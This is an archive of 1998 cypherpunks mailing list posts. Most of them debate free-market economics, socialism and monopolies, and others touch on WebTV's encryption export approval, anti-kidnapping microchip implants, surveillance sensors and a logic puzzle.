iQA/AwUBNhouc+lhVGT5JbsfEQJ1zwCgiBtl6sZzHIIsYr7JJKYv6pBpOY4AnRYA
mL75zLPm23xtQ7CnmxN7N/BT
=+qS1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 6 Oct 1998 08:51:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Garment industry.....
Message-ID: <199810061352.JAA04269@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Jim Choate <ravage@einstein.ssz.com>
   >
   >   To answer a qeuestion about the garment industry being monopolistic.

Zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 6 Oct 1998 09:35:00 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Microchip implants to foil VIP kidnaps
Message-ID: <v04011759b23fd58f86cf@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
From: wtberry@sprintmail.com
To: ignition-point@majordomo.pobox.com
Date: Mon, 5 Oct 1998 20:07:28 -0700
MIME-Version: 1.0
Subject: IP: Microchip implants to foil VIP kidnaps
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: wtberry@sprintmail.com

Source: Electronic Telegraph, Issue 1229,  6 October 1998

Microchip implants to foil VIP kidnaps
By Bruce Johnston in Rome

ITALIAN dignitaries who fear being kidnapped are having
microprocessor homing devices planted in their bodies so police can
track them down if they are abducted.

The microchips - called Sky-Eyes - were originally developed for
intelligence use by Israeli researchers. Rome's La Repubblica
newspaper described the latest development as a "biological
adaptation" of the Global Positioning System, which is already in use
to protect luxury cars from being stolen.

Sky-Eyes are sold by a company called Gen-Etics, which has
patented the device for private use but which is cautious about
supplying further details, in order to protect its clients.

Sky-Eyes are said to be made of "synthetic and organic fibre". They
reportedly run on such a small amount of energy that this can be
"borrowed" from the human body. The chip is supposed to be
invisible to both the naked eye and to X-rays. A person who carries it
is supplied with an eight-digit code by the company. He, or she, is
advised to divulge this only to next of kin or a trusted legal
representative.

In case of the person's disappearance, those in possession of the
code are supposed to contact the company's control centre, so that
the kidnapped victim's whereabouts may be pinpointed, and the
police informed. The Sky-Eye is said to have a margin of error of just
150 yards. Kidnapping is still common in Italy.

One recent victim, Giuseppe Soffiantini, an elderly northern
industrialist, was wary when asked if he would buy one. At the
weekend he said: "As they also know about the discovery, the
kidnappers will find a counter system to use against it. They are
treacherous."

During his long captivity, his kidnappers cut off pieces of his ears and
sent them to his family. Mr Soffiantini, was released earlier this year
after a 2 million ransom was paid. He said: "But if the microchip
worked, then of course I'd get one.

(c) Copyright of Telegraph Group Limited 1998.







**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 6 Oct 1998 10:20:08 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another potential flaw in current economic theory... (fwd)
Message-ID: <199810061524.KAA07928@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 6 Oct 1998 08:51:21 -0600 (MDT)
> From: Jim Burnes <jvb@ssds.com>
> Subject: Re: Another potential flaw in current economic theory...

> > It occurs to me that there is another potential flaw in current economic
> > theory and business practice.
> > 
> > Currently (ala Friedmann) the parties that reap the benefit of a succesful
> > business are the shareholders, this is currently seen to exclude the
> > employees in many cases/companies.
> > 
> 
> Actually not.  There are quite a few business that have employees as
> shareholders.  Most shares of companies are reasonably priced and
> easy enough to get a hold of.  Selling them on the other hand is
> not so straightforward.

This doesn't effect the premise under standard economics that the
responsibility of managers is to the shareholders *exclusively* in regards
profits and business operations.

What I am positing is the potential effects of including employees as part
of that sphere of responsibility *without* explicit stock holding by the
emplyees.

You're trying to turn apples into oranges.

[other stuff deleted]


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Tue, 6 Oct 1998 13:52:17 +0800
To: cypherpunks@toad.com
Subject: Web TV with 128b exported
Message-ID: <3.0.5.32.19981006110801.0088a430@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



http://biz.yahoo.com/prnews/981005/ca_microso_1.html

MOUNTAIN VIEW, Calif., Oct. 5 /PRNewswire/ -- Microsoft Corp.'s (Nasdaq:
MSFT - news) WebTV Networks today announced it is the first U.S. company to
obtain government approval to export nonkey recovery-based 128-bit-strength
encryption for general commercial use. WebTV Networks pioneered low-cost
access to the Internet, e-mail, financial services and electronic shopping
through a television set and a standard phone line. 

The WebTV(TM) Network service, combined with the WebTV-based Internet
terminals and receivers, is the first communications system permitted by
the U.S. government to provide strong encryption for general use by
non-U.S. citizens in Japan and the United Kingdom. Such strong encryption
allows Japanese and United Kingdom subscribers of WebTV to communicate
through the WebTV Network (both within national borders and
internationally) without fear of interception by unauthorized parties. 

etc...









  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Tue, 6 Oct 1998 13:52:10 +0800
To: cypherpunks@toad.com
Subject: advances in imaging sensors
Message-ID: <3.0.5.32.19981006111747.00890b50@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain




There was an article in a recent EETimes about a new type of very fast
imaging sensor, whose circuitry provides for very short exposures, which may
find uses in consumer items.

I was thinking that very fast image grabbers could be used to identify
moving people, e.g., in their cars at an airport, or even on the street.
The performance limit will be the sensitivity of the pixels and available
light.  But motion blur goes away.

(In my part of Calif, there are video cameras mounted on signalling poles
or streetlights in wealthy suburbs, for 'traffic monitoring' reasons.  Images
from them (as released to the public) are wide-angle, and people can't be
ID'd.
But things change.)












  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Tue, 6 Oct 1998 12:18:09 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Another potential flaw in current economic theory... (fwd)
In-Reply-To: <199810061524.KAA07928@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.981006105224.443E-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 6 Oct 1998, Jim Choate wrote:

> Forwarded message:
> 
> > Date: Tue, 6 Oct 1998 08:51:21 -0600 (MDT)
> > From: Jim Burnes <jvb@ssds.com>
> > Subject: Re: Another potential flaw in current economic theory...
> 
> > > It occurs to me that there is another potential flaw in current economic
> > > theory and business practice.
> > > 
> > > Currently (ala Friedmann) the parties that reap the benefit of a succesful
> > > business are the shareholders, this is currently seen to exclude the
> > > employees in many cases/companies.
> > > 
> > 
> > Actually not.  There are quite a few business that have employees as
> > shareholders.  Most shares of companies are reasonably priced and
> > easy enough to get a hold of.  Selling them on the other hand is
> > not so straightforward.
> 
> This doesn't effect the premise under standard economics that the
> responsibility of managers is to the shareholders *exclusively* in regards
> profits and business operations.
>

Hmmm.  You imply that the employees and employers interests are not
the same.  The whole idea is to make a profit.  Out of those
profits the employees are payed the salaries they use to keep
their families in beer and bedclothes.  What other sort of interest
do you suggest the company should have?  They already get significant
benefits in insurance etc.  Many employees already have the option
to buy shares.  Certainly this is the case in publically traded
companies -- many publically traded companies offer these same
shares at a discount to employees.  

Any other sort of interest would simply induce a market distortion
in the cost of investment capital.

The market detects socialism as damage and routes around it.

The entire market would never do this voluntarily, so by definition any
distortion would have to be induced in a centrally managed economy.

By definition socialism.

But look at the bright side.  We already have people who think
they can centrally manage the economy.  They've certainly made
inroads.

jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 6 Oct 1998 12:59:56 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another potential flaw in current economic theory... (fwd)
Message-ID: <199810061803.NAA08378@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 6 Oct 1998 11:19:54 -0600 (MDT)
> From: Jim Burnes <jvb@ssds.com>
> Subject: Re: Another potential flaw in current economic theory... (fwd)

> Hmmm.  You imply that the employees and employers interests are not
> the same.  

Obviously this so.

> The whole idea is to make a profit.

There is MUCH more involved than simply making a profit.

[irrelevant material deleted]

> Any other sort of interest would simply induce a market distortion
> in the cost of investment capital.

Demonstrate please.

> The market detects socialism as damage and routes around it.

Whoa horsey. I didn't say a damn thing about any third party regulatory
agency getting invovled here. Don't start trying to change the rules in the
middle of the game.

> The entire market would never do this voluntarily, so by definition any
> distortion would have to be induced in a centrally managed economy.

Demonstrate.

> By definition socialism.

Wrong. Socialism is the belief that property is best managed and owned by
the government. This is within the context of a free market. This means that
the *ONLY* two parties involved are the producers and consumers. I am
discussing an alternative approach to business management.

Fascism is the belief that property should be owned by private individuals
but managed by governments.

Capitalism is the belief that property should be owned and managed by the
individual. Note that this definition doesn't prevent 3rd party regulatory
bodies, but they neither own or manage the activity, only limit its' scope.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 6 Oct 1998 06:18:20 +0800
To: cypherpunks@cyberpass.net
Subject: Re: odd comment
Message-ID: <361A794B.4912@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Sounds like a potential urban legend or at least a misnaming of some
comprehensible system.

> A friend of mine works in an IT department
> for a major tech company.  Three of the people in
> his department were just transfered to their new contract.
>
> They are rewiring some of the network for a highway system
> in California that monitors for explosives.
>
What are the techniques that could be used for detecting conventional
materials? I can't think of anything likely to work through a vehicle
panel on a highway at 65 mph. Doesn't mean there isn't such a system. I
guess a neutron counter or other radiation detector might be useful for
spotting the scary new  SUPERTERRORISTS.

> On top of the poles are two 
> metal boxes about the size large bread boxes.
>
> Now any idea what those boxes are?
>
If they have plastic windows they could be speed measurement devices.
I'd be interested in driving by some, are there some examples that are
closer to Pleasanton? You can always ask your highway department
representative - they might talk before thinking even if it's something
TOP SECRET.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 6 Oct 1998 06:24:08 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Another potential flaw in current economic theory... (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A1F@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate
> Wrong. Socialism is the belief that property is best managed 
> and owned by the government.

Utopian socialism/communism believed that property is best managed and
owned by the people -- the people as some abstract collective entity aka
proletariat aka BORG. The dictatorial government is the agent of the
proletariat to abolish individual rights and transition to communist
utopia where government is no longer needed.

Of course actual socialism in mixed economies and communism in command
economies bear little resemblance to Marx's delusions.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 6 Oct 1998 06:26:57 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A20@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> Remember, you can't dominate a market that can't be saturated 
> and you can't saturate a local market unless you find a 
> mechanism to keep outside competition from moving in. Currently 
> this is only possible in very strongly regulated markets in 
> control economies.

By golly Jim you almost got it.

The only problem is your statement that one can dominate "saturable"
markets without some artificial "mechanism." If you mean dominate by
market share, then sure that is possible. But that in itself is not bad,
ALCOA dominated via low prices and high efficiency. Domination in the
bad sense is to be immune from the laws of supply and demand, and hence
have arbitrary power over the market -- that is the definition of a
coercive monopoly. You will find that that is not possible without an
artificial barrier to competition.

> Though, it does occur to me that the fact that OS/2 has a 
> stronger faction in Europe than in N. and S. America in 
> relation to Microsoft may be an indication that continental 
> saturation is possible.

The conclusions I would draw from that are IBM as the former market
giant had a very strong International infrastructure, channels and
reputation. Since the US market is the principle industry producer, it
was more competitive and less dominated by IBM. Microsoft, therefore,
had an easier time in an already competitive US market than breaking in
overseas. They also had the underdog phenomenon going for them here, the
local competitive market wanting to break IBM's dominance. The fact that
OS/2 utterly flopped in the US and found some adopters overseas is
credit to IBMs international reputation and little else.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 6 Oct 1998 06:42:12 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A21@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Brown, R Ken wrote:
> Jim can look after himself, but the aircraft industry is 
> certainly monopolistic. There are only 2 serious players 
> in the market for large long-haul airliners, Airbus..and
> Boeing

First of all the majority of the market to which they are selling is
anything but free. Each government has a monopoly on their military, and
many have a monopoly on their commercial airlines as well. Government
aren't bound by the same survival rules as consumers, they are able to
irrationally spend as the can simply extort more money.

Despite this very strong market distortion, competition for defense
contracts had been rather competitive in the US, with the recent
consolidation due to shrinking demand (note they cannot seek other
markets freely to compensate). And despite the strong market
distortions, Boeing makes a very slim profit margin on commercial
aircraft (~3%) competing with Airbus.

The private aircraft industry has had a terrible time not for lack of
demand, but because of rampant irrational and overzealous liability
claims. This has created a very limited number of vendors and highly
inflated prices.

Again, none these are natural effects of the free market.

> The real problem with monopoly or cartel is not high prices
> - many monopolies choose to charge low prices - it is lack 
> of freedom.

So you would force people to pay higher prices so can have more choices?
You would force people to support inefficient competitors?

> A monopolisitic supplier of some good has a measure 
> of political power.

Political power gums at the mean end of a gun, what political power do
monopolies have and how?

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <dan@nixon.ocis.temple.edu>
Date: Tue, 6 Oct 1998 12:50:39 +0800
To: cypherpunks@toad.com
Subject: Re: camels and bananas, for some reason.
In-Reply-To: <3.0.5.32.19981006004529.00827b20@idiom.com>
Message-ID: <Pine.OSF.3.96.981006132330.24753C-100000@nixon.ocis.temple.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 12:59 PM 10/3/98 -0400, Michael Motyka wrote:
> There is a desert which is 1000 miles across. There is a camel who can 
> carry 1000 bananas maximum. The camel eats 1 banana per mile travelled.
> The camel has a total of 3000 bananas to begin with. What is the maximum
> number of bananas that the camel can get across to the other side
> uneaten?

I had to solve this problem before, don't remember specifics (of the whole 
process that is), but to get the bananas across, you couldn't just carry
them straight through, you had to drop some off, i.e. carry 1000 bananas,
walk 333 miles (eating 333 bananas), drop off 334, walk back (finishing off
the remaining ones), then when you got to that point again, (the 333 mark)
you would have 1000 again... the answer was 533+(1/3) iirc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 6 Oct 1998 06:44:07 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Another question about free-markets...
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A22@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
[govt subsidies to transcontinental railroads]
> Only *after* it was clear that these companies could not 
> do it themselves because of a lack of sufficient traffic 
> to support the business.

So if the market could not support it, who paid for it and how, who
benefited from the distortion and who paid the price? The market demands
the most efficient distribution of capital resources, when the
government screws with that and screws with the market, the resulting
problems (arbitrary coercive power of Western railroads, and severe lack
of quality and safety) are because of that distortion, not the market.

The government should have *not* intervened.

Which is not my point though, my point is the judgements of an
uneducated populace and corrupted government to blame this as a natural
effect of a free market should not be carried forward, it needs to be
exposed and corrected.

[oil mineral rights]
>> The placement (ownership) of these rights, their value, 
>> restrictions and enforcement are the result of a free 
>> market? No, government intervention.
> 
> Actualy no, try buying a piece of land and enforcing the 
> title *without* registering it at the country seat or its
> likes.

Which is not a market instrument, it is a government instrument.
Government intervention does not necessarily have to be direct and
purposeful.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 6 Oct 1998 14:51:04 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another potential flaw in current economic theory... (fwd)
Message-ID: <199810061955.OAA08893@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 6 Oct 1998 20:35:53 +0100
> From: Steve Mynott <stevem@tightrope.demon.co.uk>
> Subject: Re: Another potential flaw in current economic theory... (fwd)

> how can you "own" something yet not control it?  fascism is a form of
> socialism

I 'own' my freedom but I *never* control it. Its expression is a direct
result of *others* respecting that ownership.

Another example is a very old Chinese proverb from The Masao:

You are
What you do
When it counts

The point being, you *never* have anything to say about when it counts.

Not to mention the obvious retort, what do you mean by 'control'...

> any true cypherpunk must be a libertarian..

In your opinion.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SDN <sdn@divcom.slimy.com>
Date: Tue, 6 Oct 1998 08:23:15 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Web TV with 128b exported
In-Reply-To: <3.0.5.32.19981006110801.0088a430@m7.sprynet.com>
Message-ID: <19981006151326.A7421@divcom.slimy.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Oct 06, 1998 at 04:32:07PM -0500, William H. Geiger III wrote:
> In <3.0.5.32.19981006110801.0088a430@m7.sprynet.com>, on 10/06/98 
>    at 11:08 AM, David Honig <honig@sprynet.com> said:
> 
> >http://biz.yahoo.com/prnews/981005/ca_microso_1.html
> 
> >MOUNTAIN VIEW, Calif., Oct. 5 /PRNewswire/ -- Microsoft Corp.'s (Nasdaq:
> >MSFT - news) WebTV Networks today announced it is the first U.S. company
> >to obtain government approval to export nonkey recovery-based
> >128-bit-strength encryption for general commercial use. WebTV Networks
> >pioneered low-cost access to the Internet, e-mail, financial services and
> >electronic shopping through a television set and a standard phone line. 
> 
> >The WebTV(TM) Network service, combined with the WebTV-based Internet
> >terminals and receivers, is the first communications system permitted by
> >the U.S. government to provide strong encryption for general use by
> >non-U.S. citizens in Japan and the United Kingdom. Such strong encryption
> >allows Japanese and United Kingdom subscribers of WebTV to communicate
> >through the WebTV Network (both within national borders and
> >internationally) without fear of interception by unauthorized parties. 
> 
> I have my doubts on this. I find it highly unlikely that the FEDs would
> approve this without some form of GAK built in even if it is not in the
> form of "key recovery".

It's probably a lot closer to the "private doorbell" scenario.  The only
thing that a WebTV unit will communicate with is the WebTV service (or
the Japanese variant thereof).

Since all traffic goes through a point that will likely cooperate with
law enforcement (and has remote control of the boxes, too.), this doesn't
represent much of a loosening in the export controls.

It's probably as good as or better than any other Microsoft crypto, though.

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 6 Oct 1998 08:28:47 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A25@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Brown, R Ken wrote:
> Same applies to education - I might be able to pay for my 
> daughter to go to school but we want everybody else's kids 
> to go to school as well because my life is better if they do. 
> So we pay for it through tax.

"SHOULD EDUCATION BE COMPULSORY AND TAX-SUPPORTED, AS IT IS TODAY?

The answer to this question becomes evident if one makes the question
more concrete and specific, as follows: Should the government be
permitted to remove children forcibly from their homes, with or without
the parents' consent, and subject the children to educational training
and procedures of which the parents may or may not approve? Should
citizens have their wealth expropriated to support an educational system
which they may or may not sanction, and to pay for the education of
children who are not their own?" -- Nathaniel Branden

Absolutely not.

But even if you take a strong socialist/statist position and answer
"yes," how can you justify expounding on the evils of coercive
monopolies, their arbitrary power, abuse and inefficiency, and then at
the same time make Education, one of the most important services to
society, a coercive monopoly?! This simply does not make sense.

Education needs to be brought into the marketplace so it can be
objectively evaluated. VALUED. As an entitlement, education is not
valued as it should be, and as a monopoly there is no leverage to choose
standards which to value, to discriminate service.

The educational system has failed worse than any other industry, not for
lack of supply and demand, but for lack of free competition.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 6 Oct 1998 08:34:48 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A26@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> Political power gums at the mean end of a gun, what political 
> power do monopolies have and how?

err...*comes* from the mean end of a gun. ;)

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Tue, 6 Oct 1998 07:49:05 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Another potential flaw in current economic theory... (fwd)
In-Reply-To: <199810061803.NAA08378@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.981006140945.443I-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 6 Oct 1998, Jim Choate wrote:

> Forwarded message:
> 
> > Date: Tue, 6 Oct 1998 11:19:54 -0600 (MDT)
> > From: Jim Burnes <jvb@ssds.com>
> > Subject: Re: Another potential flaw in current economic theory... (fwd)
> 
> > Hmmm.  You imply that the employees and employers interests are not
> > the same.  
> 
> Obviously this [is] so.
> 

Demonstrate.  Are you saying the interests of the employees is
not in making money?  In corps that is done by making a profit.
I guess the employees could just steal from the cookie jar.
I don't imagine the majority of the employees favor this route.

> > The whole idea is to make a profit.
> 
> There is MUCH more involved than simply making a profit.

Demonstrate.  The basis of capitalism is wealth creation through
capital accretion and investment.  Investment is risk laden.  Why 
should I invest my capital, which represents many things, goods,
services, time, etc if there is no payoff?  Might as well stay
in bed.

If profit is not the driving concern of investors, maybe you could
enlighten us unwashed masses.  The wealth that is created (payroll
included) can be then used for anything you like, from buying snowcones
and sniper rifles to donating your cash to the Nature Conservancy. 
Whatever agenda you prefer.

> 
> [irrelevant material deleted]
> 
> > Any other sort of interest would simply induce a market distortion
> > in the cost of investment capital.
> 
> Demonstrate please.

It follows that if you water down the proceeds without any accounting
system then all you're doing is giving away benefits.  These will 
(all other things being equal) reduce profits and decrease the
value of the stock.  It will then cost a lot more to attract
investment capital -- perhaps to the point of dissolution of
the company for lack of investment.  The most the employees
will be out is their job.  The investors could be out their
entire life savings.

> 
> > The market detects socialism as damage and routes around it.
> 
> Whoa horsey. I didn't say a damn thing about any third party regulatory
> agency getting invovled here. Don't start trying to change the rules in the
> middle of the game.

OK.  But my point still holds -- that all other things being equal
sending more bennies out to the employees isn't going to help your
stock prices, unless it also produces a concommitant increase in
productivity.  Still they are just bennies -- nothing new.

If you are going to give the employees equity in the company's future, how
do you do the accounting??  Somehow you will have to keep track of those
shares of equity.  Woops...were back to stock again.  If you're argument
is that that still doesn't make the management answerable, then what are
voting blocks of shares?  If there is an issue that is important to the
employee voting block they can take it up in the stock meeting.  If they
loose, they can simply threaten to sell the block of stock and start their
own company.  Maybe they can do better.  Good luck to them.

> 
> > The entire market would never do this voluntarily, so by definition any
> > distortion would have to be induced in a centrally managed economy.
> 
> Demonstrate.

Because these benefits are simply added cost to the production of
goods and services (all other things being equal).  When Joe Consumer
goes to buy something, cost (at some level of acceptable quality) is
usually the driving concern.  They don't give a damn about lofty
employee bonus programs.  Most people don't give a damn if their
cool new hiking shoes are made in Denver or Beijing.


> 
> > By definition socialism.
> 
> Wrong. Socialism is the belief that property is best managed and owned by
> the government. This is within the context of a free market. This means that
> the *ONLY* two parties involved are the producers and consumers. I am
> discussing an alternative approach to business management.
> 
> Fascism is the belief that property should be owned by private individuals
> but managed by governments.
> 

You're simply splitting hairs here.  Systems of "fascism" and "socialism" 
have redefined "ownership" until people become slaves to the people
controlling the definitions.  Private ownership in the current system,
fascist systems and socialist systems is a legal fiction.  Ownership
implies having sole benefit from use and disposal of the items in
question.   Under most governmental systems now in existence ownership is
actually just rental where the state owns everything and tells you what
your percentage is going to be.  The only difference between
marxism/socialism/communism and fascism is the point at which the
state reclaims its property.  In marxist systems the State reclaims
its "property" in the beginning, assuming all people are of a criminal
mindset and not worthy of real ownership.  In socialist and
pseudo-socialist systems like ours, ownership is a fantasy until
profit is derived -- you are then assumed to be a robber baron.
In a free state ownership is yours until a court can prove you
are a criminal who has caused harm to others.  What is amusing is
that our system has finally removed the burden of proof in
civil forfeiture law so that your "property" is considered to
be a criminal until proven otherwise.  It is then taken into
custody.  (*)

The primary failing of marxism is that people were never allowed
to even *believe* they could "own" something.  That being the case
they were unlikey to bother adding any value to anything.  That is
why they are boiling stones for soup.  Now "ownership" has devolved
to the russian mafia.  Same thing.  Unless the people of Russia
smuggle themselves in a bunch of arms, institute and enforce a 
free market system with private property ownership they will never
be anything more than peasants. (*)  

The reason why socialism-light (our system) works is because people
are allowed to believe they own assets until those assets become
valuable.  The state then comes to tell you what your percentage
of the sharecropping you get to keep.  Of course you're allowed to
believe you own something unprofitable forever (unless your using
it write off taxes ;-)

This allows socialism-light to succeed over marxism.  By the time
people have successfully created wealth its too late to go back
and wonder what the hell you've gotten yourself into.

(*) Footnotes:

Footnote 1:

Its interesting to note that civil law, where property can be
held accountable, is an outgrowth of medieval trials where
non-sentient entities where held accountable for acts of god
(or the devil).  If there was a crop blight, several local pigs
could be put on trial, found guilty and burned.  Strange people,
humans.

Footnote 2:

People who have never known real freedom, never know when they
should fight for it.  Two cases in point:

I was flying back from Anguilla into Denver in '97 and was sitting next to
an intelligent and attractive Russian woman in her late teens/ early
twenties.  She was telling me all about what was going on in Russia with
the Mafia controlling the cities.  Extorting money from her father's
restaurant seemed to be a favorite pastime for them.  I thought a second
about this and asked her why her father and the other people on the
block didn't just buy a bunch of hunting shotguns etc and blow them
away next time they tried to collect.  She looked at me with a face
of total puzzlement.  The thought of defending themselves never crossed
her mind.  Much like the farmers who were ravaged during the
Japanese civil wars they had no idea that simply arming themselves
would discourage most would be attackers.

Yesterday I was getting my hair cut and one of the women doing the
haircuts was obviously a Russian immigrant.  She was also complaining
about how terrible it was right now.  She was saying that "all people
really wanted was to be left alone".  It really sickened me that 
here was a person with a peasant mindset.  That person came to the
United States and is now a citizen.  One more person that doesn't
have the guts to stand against criminals.  Unfortunately one more
person voting in the United States.

Freedom isn't free.

jim burnes
definitely out in the weeds now







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 6 Oct 1998 09:11:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re : IP: Microchip implants to foil VIP kidnaps
Message-ID: <361AA2B1.5A8F@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> ITALIAN dignitaries who fear being kidnapped are having
> microprocessor homing devices planted in their bodies so police can
> track them down if they are abducted.
>
Where can I buy one of these things for my cat? My master password is
tatooed inside her upper lip.

This brand new GPS system works through a metal barrier?

For transport just tuck the subject in the back of an aluminum cargo
truck and for long-term storage use a metal wharehouse. Contrary to
popular belief there is not a technical solution for every problem. How
about -well-paid- bodyguards?

Ask an engineer to solve a problem you get Tom Swift and his amazing
electrogenerating geodetector.
Ask a politician to solve a problem you get a law.
Ask a doctor to solve a problem and he'll either cut or medicate.
Ask a soldier to solve a problem...
And so on...

I suppose ridiculous solutions are fine as long as they make money or
fame for someone.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 6 Oct 1998 07:14:31 +0800
To: cypherpunks@einstein.ssz.com
Subject: Yet Again Another Snake Oil Vendor
Message-ID: <199810062107.RAA26498@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



Below is a message I posted to the SpyKing mailing list a few months back
when Jaws decided to spam the list with their crypto "challange".

>From: "William H. Geiger III" <whgiii@invweb.net>
